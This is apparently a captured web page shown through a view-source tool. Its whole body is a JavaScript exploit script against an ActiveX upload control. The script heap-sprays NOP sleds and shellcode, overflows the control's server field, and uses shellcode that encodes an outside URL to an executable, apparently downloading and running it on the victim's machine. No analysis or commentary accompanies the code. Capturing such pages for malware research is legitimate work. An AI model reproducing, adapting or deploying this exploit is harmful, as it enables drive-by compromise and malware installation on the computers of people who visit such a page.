URL:    [ Dan Winchester Home ] [ View Source Home ]  
HTTP/1.1 200 OK
Connection: close
Date: Mon, 08 Jun 2009 12:18:04 GMT
Content-Length: 1523
Content-Type: text/html
Last-Modified: Thu, 04 Dec 2008 19:37:48 GMT
Accept-Ranges: bytes
ETag: "a347ca4756c91:12af84"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<SCRIPT language="javascript">
ob="YWcUpl.WcUpload.1";
var hiahia = new ActiveXObject(ob);
var shellcode = unescape("%u9090%u9090%u9090%u9090" +
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2F3A%u6A2F%u7265%u6B69"+
"%u626F%u6F6C%u3867%u6638%u3263%u632E%u6D6F%u782F%u6E69%u616D%u782F%u6169%u652E%u6578");
headersize = 20;
bigblock = unescape("%u9090%u9090");
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<500; x++) memory[x] = block + shellcode;
var buffer = "\x0a";
while (buffer.length < 5000) buffer+="\x0a\x0a\x0a\x0a";
hiahia.server = buffer;
hiahia.initialize();
hiahia.send();
</script>
 Questions or comments welcome: contact me.